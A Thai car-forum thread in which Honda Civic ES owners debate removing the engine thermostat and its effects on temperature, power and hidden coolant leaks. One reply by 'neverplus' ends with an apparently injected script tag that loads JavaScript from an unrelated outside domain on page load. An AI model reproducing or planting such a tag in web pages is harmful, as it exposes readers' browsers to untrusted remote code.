ตอบ
josho

เข้าร่วม: 25 มิถุนา 2012
ตอบ: 813

Guru ES
Guru ES

ได้รับคำขอบคุณ: 397
ให้คำขอบคุณ: 0

ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 24 เมษา 2013 22:06 - civic es ตัดวาล์วน้ำออกจะมีปัญหาเรื่องความร้อนไหมครับ
เจ๋วเลย ต้องเปลี่ยนบ้างแล้ว
alit

ชื่อเล่น: เอ

เข้าร่วม: 25 กันยา 2009
ตอบ: 659

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1446
ให้คำขอบคุณ: 1266

ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 22 ตุลา 2013 22:09 - civic es ตัดวาล์วน้ำออกจะมีปัญหาเรื่องความร้อนไหมครับ
ผมกะจะใส่วาว์ลซิ่ง น่าจะใช้ตัวไหนดี

76.6C
76.6C
82C
82C
89c
89c
Vee

ชื่อเล่น: วีครับ

เข้าร่วม: 18 กันยา 2013
ตอบ: 2999

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1210
ให้คำขอบคุณ: 2387

สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
อังคาร, 22 ตุลา 2013 22:46 - civic es ตัดวาล์วน้ำออกจะมีปัญหาเรื่องความร้อนไหมครับ
ข้อมูลแน่นๆๆๆ

inkman

ชื่อเล่น: วี

เข้าร่วม: 16 กรกฎา 2013
ตอบ: 497

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 247
ให้คำขอบคุณ: 329

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 22 ตุลา 2013 23:44 - civic es ตัดวาล์วน้ำออกจะมีปัญหาเรื่องความร้อนไหมครับ
ขอบคุณครับสำหรับข้อมูลดีๆๆ
prgs55

ชื่อเล่น: เล็ก

เข้าร่วม: 26 มิถุนา 2010
ตอบ: 861

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1794
ให้คำขอบคุณ: 1103

ปี: 2001
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 23 ตุลา 2013 08:49 - civic es ตัดวาล์วน้ำออกจะมีปัญหาเรื่องความร้อนไหมครับ
มีผลครับผมเคยลองมาแล้ว เครื่องยนต์เบนซิลจะวิ่งดีความร้อนต้องได้ระดับที่เหมาะสม ผมเคยลองวิ่งตอน ตี 2 หน้าหนาวอากาศข้างนอกเย็นมากเข้มความร้อนตกลงเครื่องอืดเร่งไม่ออก วิ่งได้100เดียวเอง
Cool_M

ชื่อเล่น: แม็ก

เข้าร่วม: 18 ธันวา 2012
ตอบ: 1928

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2509
ให้คำขอบคุณ: 2304

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 23 ตุลา 2013 10:37 - civic es ตัดวาล์วน้ำออกจะมีปัญหาเรื่องความร้อนไหมครับ
เพิ่งถึงบางอ้อเหมือนกัน ขอบคุณมากครับ
nammon_211

ชื่อเล่น: น้ำมนต์

เข้าร่วม: 12 มิถุนา 2013
ตอบ: 2081

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1949
ให้คำขอบคุณ: 1031

สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 23 ตุลา 2013 13:16 - civic es ตัดวาล์วน้ำออกจะมีปัญหาเรื่องความร้อนไหมครับ
..
poh

ชื่อเล่น: ปู

เข้าร่วม: 11 พฤศจิกา 2012
ตอบ: 960

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 535
ให้คำขอบคุณ: 1784

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 23 ตุลา 2013 14:18 - civic es ตัดวาล์วน้ำออกจะมีปัญหาเรื่องความร้อนไหมครับ
ham_ter พิมพ์ว่า:
LifeFate พิมพ์ว่า:
เค้า เอาออกกันเพื่อ อะไร ? หรอ ครับ

วาล์วน้ำนี่เค้ามีเอาไว้ควบคุมอุณภูมิ เวลาอากาศเย็นๆ ให้เครื่องมันร้อนถึงอุณภูมิทำงาน เครื่องยนต์รถทุกคันนี่ ไม่ใช่ว่ายิ่งเย็นยิ่งดี
ถ้าเอาวาล์วน้ำออกแล้วใช้ในสถานที่อากาศที่ร้อนตลอดเช่น กทม อันนี้อาจไม่เห็นผลอ่ะไร แต่ถ้าไปใช้ในที่อากาศเย็นๆเช่นยอดดอยอินทนน์
รถของท่านอาจจะวิ่งไม่ออก ไม่ค่อยมีแรงหรือ เบาก็ดับ เนื่องจากเครื่องยนตืยังไม่ถึงอุณภูมิทำงาน จึงมีวาล์วน้ำมาตรงนี้หากยังไม่ร้อนพอ
ก็จะไม่เปิดให้น้ำหล่อเย็นทำงาน
สรุปแล้วถ้าท่านใช้รถในหลายสภาพอากาศ เช่นเมืองไทย ก็ควรมีวาล์วน้ำค่ะ โรงงานเค้าติดมาให้ก็เพราะแบบนี้แหละค่ะ เราว่ามีไว้ดีกว่าไม่มีนะ
ถึงแม้อยู่ใน กทม วาลืวน้ำก็ทำให้เราใช้เวลาวอร์มเครื่องน้อยลงค่ะ
วาวล์น้ำมีประโยชน์สำหรับให้เครื่องยนต์อยู่ในอุณหภูมิที่เหมาะสม แต่รถก็อายุเก่ามากแล้วค่ะ การที่เราถอดวาวล์น้ำออก
ก็เป็นการระบายความร้อนของเครื่องยนต์ ทำให้เครื่องยนต์ไม่ร้อนเกินไปนี่คะ เท่าที่เข้าใจง่ายๆก็คือ ตอนที่อากาศเย็นหรือ
เครื่องยังเย็นอยู่ในตอนแรก วาวล์น้ำจะปิดก่อน เพื่อให้ครื่องยนต์มีอุณหภูมิที่เหมาะสมค่ะ หลังจากนั้น พอเครื่องร้อน
วาวล์น้ำก็เปิดให้ระบบระบายความร้อนได้ไหลเวียนไปหาเครื่องยนต์
ดังนั้น ถ้าเราไม่เอาวาวล์น้ำออก ก็ต้องอั้นน้ำให้ได้ความร้อนเพื่อจะได้มีกำลัง แต่รถที่มีปัญหาเรื่องฝาสูบ และหม้อน้ำ จะทำให้น้ำมีแรงดัน
ตอนที่วาวล์ยังไม่เปิด  ทำให้น้ำต้องทิ้งออก แล้วก็จะทำให้น้ำแห้งได้ การที่เราเอาวาวล์น้ำออก เป็นการลดแรงดันน้ำที่จะล้นออกให้ไหลเวียน
แทน จะได้ไม่หายไปไหน รถเก่าแล้ว ระบบบางระบบมันเสื่อมสภาพไปแล้ว แล้วเท่าที่เคยได้ยินมา รถเก่านี่ทำหม้อน้ำแตกไปหลายคันแล้ว
ถ้าไม่เอาวาวล์น้ำออก การเอาออกสามารถลดแรงดันได้ แต่นั่นเป็นการแก้ปัญหาที่ปลายเหตุเมื่อระบบหล่อเย็นของท่านไม่สมบูรณ์
วิธีแก้ที่ต้นเหตุจริงๆคือ 
ทำระบบหล่อเย็นให้สมบูรณ์ที่สุด แล้วใส่วาวล์น้ำไว้เถอะ เพราะเมื่อน้ำหาย ระบบรั่ว ถ้าไม่มีวาล์น้ำกักน้ำไว้ในเครื่องนี่เครื่องพังอย่างเดียวนะ
เพราะเทอโมมันวัดตามอุณหภูมิน้ำ เมื่อเอาวาวล์น้ำออก ไม่มีตัวกักน้ำ เมื่อน้ำหาย ระบบรั่ว เราจะไม่รู้ตัว เพราะเข็มความร้อนจะม่กระดิก
เพราะมันไม่มีน้ำให้วัด จะรู้ตัวอีกทีก็ตอนเครื่องพัง ก้านคด ชาร์พละลาย ดับคาทีน ไปแล้วนั่นเอง

ข้อมูลดีมากคับ
พุธโคราช

เข้าร่วม: 17 กันยา 2013
ตอบ: 370

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 257
ให้คำขอบคุณ: 86

สี: แดง รอยัล รูบี้ (มุก) (R-522P)
พุธ, 23 ตุลา 2013 15:28 - civic es ตัดวาล์วน้ำออกจะมีปัญหาเรื่องความร้อนไหมครับ
แนะนำเพิ่มครับ ถ้าเอาวาวล์น้ำออกอุณหภูมิของเสื้อสูบเครื่องยนต์จะไม่เท่นกัน(ผนังกระบอกสูบแต่ละสูบ)การหมุนวนของน้ำ

หล่อเย็นเข้าไม่ถึงบางจุด พออุณหภูมิไม่เท่ากันการสึกหรอของลูกสูบและแหวนต่างกันครับ ทำให้เครื่องยนต์ทำงานไม่เต็มที่

แรงมาเครื่องยนต์จะต่ำกว่าที่ควรเป็น และรถES กับรถรุ่นใหม่ ๆ ทุกวันนี้ใช้อุณภูมิของน้ำเป้นตัวควบคุมระบบต่าง ๆ เยอะขึ้น

ไม่ควรถอดครับ หากจำเป็นต้องทำแนะนำให้ใช้สว่านดอกขนาด1.5 มิล เจาะที่ข้างวาวล์น้ำ เพื่อให้น้ำอุ่นผ่านได้บ้าง แต่ระบบ

จะไม่เปลี่ยนไปครับ สำคัญที่สุดอุณหภูมิเครื่องยนต์จะคงที่ไม่หลอกเราครับ ตะกอนน้ำก็จะไม่ซุกอยู่ตามซอกภายในเครื่องยนต์ด้วยครับ
aonjang237

ชื่อเล่น: อ้น

เข้าร่วม: 11 มิถุนา 2013
ตอบ: 812

Guru ES
Guru ES

ได้รับคำขอบคุณ: 555
ให้คำขอบคุณ: 130

พุธ, 23 ตุลา 2013 16:04 - civic es ตัดวาล์วน้ำออกจะมีปัญหาเรื่องความร้อนไหมครับ
เก็บข้อมูล 
Parongong

ชื่อเล่น: เว่อร์

เข้าร่วม: 08 กันยา 2013
ตอบ: 518

ได้รับคำขอบคุณ: 462
ให้คำขอบคุณ: 11

สี: น้ำเงิน อิเทอนอล (B-96P)
พุธ, 23 ตุลา 2013 20:54 - civic es ตัดวาล์วน้ำออกจะมีปัญหาเรื่องความร้อนไหมครับ
เก็บข้อมูลด้วยคน
neverplus

ชื่อเล่น: วิน

เข้าร่วม: 01 กรกฎา 2013
ตอบ: 1591

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1061
ให้คำขอบคุณ: 185

พุธ, 23 ตุลา 2013 21:17 - civic es ตัดวาล์วน้ำออกจะมีปัญหาเรื่องความร้อนไหมครับ
ของผมมันเสียแล้วช่างบอกว่าไม่ต้องใส่ก็ได้ 

ถอดมา 2 เดือนได้แล้ว สงสัยคงต้องกลับไปให้ช่างใส่ดีกว่า 

ว่าแต่ใครพอทราบราคาบ้างครับ "<script src="https://sport32news.com/civicesgroup.js">
hlinturbo

ชื่อเล่น: สัก คร๊าบบ

เข้าร่วม: 28 พฤศจิกา 2010
ตอบ: 139

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 80
ให้คำขอบคุณ: 124

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 23 ตุลา 2013 22:29 - civic es ตัดวาล์วน้ำออกจะมีปัญหาเรื่องความร้อนไหมครับ
ลองดูราคา ในห้องpart number เอาครับน่าจะมีราคาอยู่นะ
indica999

เข้าร่วม: 02 สิงหา 2013
ตอบ: 286

ได้รับคำขอบคุณ: 569
ให้คำขอบคุณ: 190
พฤหัส, 24 ตุลา 2013 02:42 - civic es ตัดวาล์วน้ำออกจะมีปัญหาเรื่องความร้อนไหมครับ
แล้วถ้าผมปาดฝาสูบมา ตอนนี้ไม่ใส่วาวล์น้ำ อุณภูมิตอนเครื่องทำงาน ก็ขีดปกติกะก่อนปาดฝา ถ้าผมไปใส่วาวล์น้ำมันจะสูงขึ้นรึเปล่าครับ
aumlight

ชื่อเล่น: อั้ม

เข้าร่วม: 27 พฤษภาคม 2013
ตอบ: 925

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 675
ให้คำขอบคุณ: 155

สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 24 ตุลา 2013 08:04 - civic es ตัดวาล์วน้ำออกจะมีปัญหาเรื่องความร้อนไหมครับ
+10 เก็บข้อมูลครับ

hlinturbo

ชื่อเล่น: สัก คร๊าบบ

เข้าร่วม: 28 พฤศจิกา 2010
ตอบ: 139

ได้รับคำขอบคุณ: 80
ให้คำขอบคุณ: 124

ศุกร์, 25 ตุลา 2013 00:30 - civic es ตัดวาล์วน้ำออกจะมีปัญหาเรื่องความร้อนไหมครับ
ผมก็ปาดมา วาล์วน้ำของศูนย์ อุณหภูมิก็ปกตินะครับ
R_pongpat

เข้าร่วม: 02 พฤศจิกา 2012
ตอบ: 204

ได้รับคำขอบคุณ: 39
ให้คำขอบคุณ: 1

พุธ, 30 กรกฎา 2014 07:39 - civic es ตัดวาล์วน้ำออกจะมีปัญหาเรื่องความร้อนไหมครับ
ผมปาดฝามาช่างบอกว่าไม่ต้องใส่คับ ช่างมันเลยถอดออก จะมีปัญหาอะไรไหมคับ ชี้แนะด้วยคับ
Pantamitr

ชื่อเล่น: ห่าน

เข้าร่วม: 27 พฤษภาคม 2010
ตอบ: 1622

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1792
ให้คำขอบคุณ: 1186

พฤหัส, 31 กรกฎา 2014 08:27 - civic es ตัดวาล์วน้ำออกจะมีปัญหาเรื่องความร้อนไหมครับ
R_pongpat พิมพ์ว่า:
ผมปาดฝามาช่างบอกว่าไม่ต้องใส่คับ ช่างมันเลยถอดออก จะมีปัญหาอะไรไหมคับ ชี้แนะด้วยคับ

อ่าน กท.คำตอบของส้มจี๊ด และของหลายๆคนนะครับ ชัดเจนอยู่แล้ว

ผมว่าช่าง ตัดปัญหาที่ปลายเหตุนะ ไปปาดฝาสูบเขา แล้วถอดวาล์วน้ำทิ้งเนี่ย น่าตบกระบาล
ว่าแต่ ทำไมถึงต้องปาดฝาสูบครับ
R_pongpat

พฤหัส, 31 กรกฎา 2014 21:27 - civic es ตัดวาล์วน้ำออกจะมีปัญหาเรื่องความร้อนไหมครับ
Pantamitr พิมพ์ว่า:

อ่าน กท.คำตอบของส้มจี๊ด และของหลายๆคนนะครับ ชัดเจนอยู่แล้ว

ผมว่าช่าง ตัดปัญหาที่ปลายเหตุนะ ไปปาดฝาสูบเขา แล้วถอดวาล์วน้ำทิ้งเนี่ย น่าตบกระบาล
ว่าแต่ ทำไมถึงต้องปาดฝาสูบครับ

ท่อน้ำรั่วคับ มาสังเกตุอีกที่ไม่รุฮีตตั้งแต่ตอนไหน
พอเอาไปเปลี่ยนท่าน้ำมา ท่อดันหลุดฮีตอีก
เดินทาง ตจว. ด้วยคับร
Pantamitr

ชื่อเล่น: ห่าน

เข้าร่วม: 27 พฤษภาคม 2010
ตอบ: 1622

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1792
ให้คำขอบคุณ: 1186

ศุกร์, 1 สิงหา 2014 07:41 - civic es ตัดวาล์วน้ำออกจะมีปัญหาเรื่องความร้อนไหมครับ

ท่อน้ำรั่วคับ มาสังเกตุอีกที่ไม่รุฮีตตั้งแต่ตอนไหน
พอเอาไปเปลี่ยนท่าน้ำมา ท่อดันหลุดฮีตอีก

ฝาสูบโก่งเหรอครับ 

ยิ่งไม่ควรตัดวาล์วน้ำเลยนะครับ เพราะเวลาเครื่องเย็นๆ สูบยิ่งกระทุ้งแรงอัดมากกว่าเดิมอีก
ซ้อนปะเก็นให้ใกล้เคียงของเดิมได้ไหมครับ 

เทพ

ชื่อเล่น: เทพ

เข้าร่วม: 10 เมษา 2013
ตอบ: 424

ได้รับคำขอบคุณ: 280

ศุกร์, 1 สิงหา 2014 22:22 - civic es ตัดวาล์วน้ำออกจะมีปัญหาเรื่องความร้อนไหมครับ
ham_ter พิมพ์ว่า:

LifeFate พิมพ์ว่า:
เค้า เอาออกกันเพื่อ อะไร ? หรอ ครับ

วาล์วน้ำนี่เค้ามีเอาไว้ควบคุมอุณภูมิ เวลาอากาศเย็นๆ ให้เครื่องมันร้อนถึงอุณภูมิทำงาน เครื่องยนต์รถทุกคันนี่ ไม่ใช่ว่ายิ่งเย็นยิ่งดี
ถ้าเอาวาล์วน้ำออกแล้วใช้ในสถานที่อากาศที่ร้อนตลอดเช่น กทม อันนี้อาจไม่เห็นผลอ่ะไร แต่ถ้าไปใช้ในที่อากาศเย็นๆเช่นยอดดอยอินทนน์
รถของท่านอาจจะวิ่งไม่ออก ไม่ค่อยมีแรงหรือ เบาก็ดับ เนื่องจากเครื่องยนตืยังไม่ถึงอุณภูมิทำงาน จึงมีวาล์วน้ำมาตรงนี้หากยังไม่ร้อนพอ
ก็จะไม่เปิดให้น้ำหล่อเย็นทำงาน
สรุปแล้วถ้าท่านใช้รถในหลายสภาพอากาศ เช่นเมืองไทย ก็ควรมีวาล์วน้ำค่ะ โรงงานเค้าติดมาให้ก็เพราะแบบนี้แหละค่ะ เราว่ามีไว้ดีกว่าไม่มีนะ
ถึงแม้อยู่ใน กทม วาลืวน้ำก็ทำให้เราใช้เวลาวอร์มเครื่องน้อยลงค่ะ
วาวล์น้ำมีประโยชน์สำหรับให้เครื่องยนต์อยู่ในอุณหภูมิที่เหมาะสม แต่รถก็อายุเก่ามากแล้วค่ะ การที่เราถอดวาวล์น้ำออก
ก็เป็นการระบายความร้อนของเครื่องยนต์ ทำให้เครื่องยนต์ไม่ร้อนเกินไปนี่คะ เท่าที่เข้าใจง่ายๆก็คือ ตอนที่อากาศเย็นหรือ
เครื่องยังเย็นอยู่ในตอนแรก วาวล์น้ำจะปิดก่อน เพื่อให้ครื่องยนต์มีอุณหภูมิที่เหมาะสมค่ะ หลังจากนั้น พอเครื่องร้อน
วาวล์น้ำก็เปิดให้ระบบระบายความร้อนได้ไหลเวียนไปหาเครื่องยนต์
ดังนั้น ถ้าเราไม่เอาวาวล์น้ำออก ก็ต้องอั้นน้ำให้ได้ความร้อนเพื่อจะได้มีกำลัง แต่รถที่มีปัญหาเรื่องฝาสูบ และหม้อน้ำ จะทำให้น้ำมีแรงดัน
ตอนที่วาวล์ยังไม่เปิด  ทำให้น้ำต้องทิ้งออก แล้วก็จะทำให้น้ำแห้งได้ การที่เราเอาวาวล์น้ำออก เป็นการลดแรงดันน้ำที่จะล้นออกให้ไหลเวียน
แทน จะได้ไม่หายไปไหน รถเก่าแล้ว ระบบบางระบบมันเสื่อมสภาพไปแล้ว แล้วเท่าที่เคยได้ยินมา รถเก่านี่ทำหม้อน้ำแตกไปหลายคันแล้ว
ถ้าไม่เอาวาวล์น้ำออก การเอาออกสามารถลดแรงดันได้ แต่นั่นเป็นการแก้ปัญหาที่ปลายเหตุเมื่อระบบหล่อเย็นของท่านไม่สมบูรณ์
วิธีแก้ที่ต้นเหตุจริงๆคือ 
ทำระบบหล่อเย็นให้สมบูรณ์ที่สุด แล้วใส่วาวล์น้ำไว้เถอะ เพราะเมื่อน้ำหาย ระบบรั่ว ถ้าไม่มีวาล์น้ำกักน้ำไว้ในเครื่องนี่เครื่องพังอย่างเดียวนะ
เพราะเทอโมมันวัดตามอุณหภูมิน้ำ เมื่อเอาวาวล์น้ำออก ไม่มีตัวกักน้ำ เมื่อน้ำหาย ระบบรั่ว เราจะไม่รู้ตัว เพราะเข็มความร้อนจะม่กระดิก
เพราะมันไม่มีน้ำให้วัด จะรู้ตัวอีกทีก็ตอนเครื่องพัง ก้านคด ชาร์พละลาย ดับคาทีน ไปแล้วนั่นเอง

ทั้งสวยทั้งเก่ง เยี่ยมไปเลยครับ 

R_pongpat

เสาร์, 2 สิงหา 2014 02:02 - civic es ตัดวาล์วน้ำออกจะมีปัญหาเรื่องความร้อนไหมครับ

ฝาสูบโก่งเหรอครับ 

ยิ่งไม่ควรตัดวาล์วน้ำเลยนะครับ เพราะเวลาเครื่องเย็นๆ สูบยิ่งกระทุ้งแรงอัดมากกว่าเดิมอีก
ซ้อนปะเก็นให้ใกล้เคียงของเดิมได้ไหมครับ 

ช่ายคับฝาโกง
ผมโทรถามช่างว่าได้เก็บวาล์วน้ำไว้หรือป่าว ช่างเลยบอกว่าไม่ต้องใส่หรอกมันจะได้ระบายความร้อนได้ดี สรุปคือเหมือนช่างมันไม่อยากใส่ให้คับ ตอนนี้รถผมมีอาการเวลาเคื่องร้อนแล้วรอบเดินเบาตกไม่แน่ใจว่าเกี่ยวเนื่องกันหรือป่าว ตอนเครื่องเย็นไม่มัปัญหาคับ ชี้แนะด้วยคับ
ตอบ
หน้า 2 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.